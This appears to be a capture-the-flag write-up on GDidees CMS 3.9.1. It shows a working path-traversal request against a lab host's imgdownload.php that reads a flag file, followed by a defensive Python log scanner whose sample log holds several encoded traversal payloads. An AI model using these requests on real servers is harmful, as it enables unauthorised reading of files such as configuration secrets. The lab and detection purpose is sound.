
CVE-2023-27178

Info

Tags

  • GDidees CMS

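Official database record

An arbitrary file upload vulnerability in the upload function of GDidees CMS 3.9.1 allows attackers to execute arbitrary code via a crafted file.

According to material found online, the vulnerability is in the file upload functionality under the /_admin/ckeditor/plugins/ckfinder/ route, but it could not be bypassed.

Instead, CVE-2023-27179 (arbitrary file read) can be attempted directly: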

root@jmt-projekt:~# http "http://eci-2ze4pnf4or9co59ohuov.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../flag"
HTTP/1.1 200 OK
Cache-Control: must-revalidate, post-check=0, pre-check=0, public
Connection: keep-alive
Content-Disposition: attachment; filename="flag.png"
Content-Length: 42
Content-Transfer-Encoding: $type\n
Content-Type: application/force-download
Date: Tue, 23 Jul 2024 15:44:22 GMT
Expires: 0
Pragma: no-cache
X-Powered-By: PHP/7.3.33

flag{a911e14f-699c-4bc3-96a8-87b5e6d36608}
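
The request above seen from the defender's side, as an added example that is not part of the original write-up: a Python check that scans web access logs for requests to the imgdownload.php endpoint whose filename parameter decodes to a path leaving its directory. The log lines are constructed, and the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format); not from the page.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Jul/2024:15:44:22 +0000] "GET /_admin/imgdownload.php?filename=../../../../../../flag HTTP/1.1" 200 42
203.0.113.5 - - [23/Jul/2024:15:44:30 +0000] "GET /_admin/imgdownload.php?filename=%252e%252e%252f%252e%252e%252fflag HTTP/1.1" 200 42
198.51.100.7 - - [23/Jul/2024:15:45:01 +0000] "GET /_admin/imgdownload.php?filename=banner.png HTTP/1.1" 200 20480
198.51.100.9 - - [23/Jul/2024:15:45:09 +0000] "GET /_admin/imgdownload.php?filename=..%5C..%5Cconfig.php HTTP/1.1" 200 512
198.51.100.7 - - [23/Jul/2024:15:46:00 +0000] "GET /index.php?page=../about HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) ')
ENDPOINT = "/_admin/imgdownload.php"  # path taken from the request shown above
PARAM = "filename"                    # query parameter taken from the same request

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the value is absolute, holds a NUL byte, or has a '..' segment."""
    path = fully_decode(value).replace("\\", "/")
    return "\x00" in path or path.startswith("/") or ".." in path.split("/")

def find_traversal(log_text):
    """Return (client, status, decoded filename) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(ENDPOINT):
            continue
        for key, val in parse_qsl(url.query, keep_blank_values=True):
            if key == PARAM and is_traversal(val):
                hits.append((client, int(status), fully_decode(val)))
    return hits

if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 and a small response size, as in the session above, is worth triaging first because it suggests the file was actually returned.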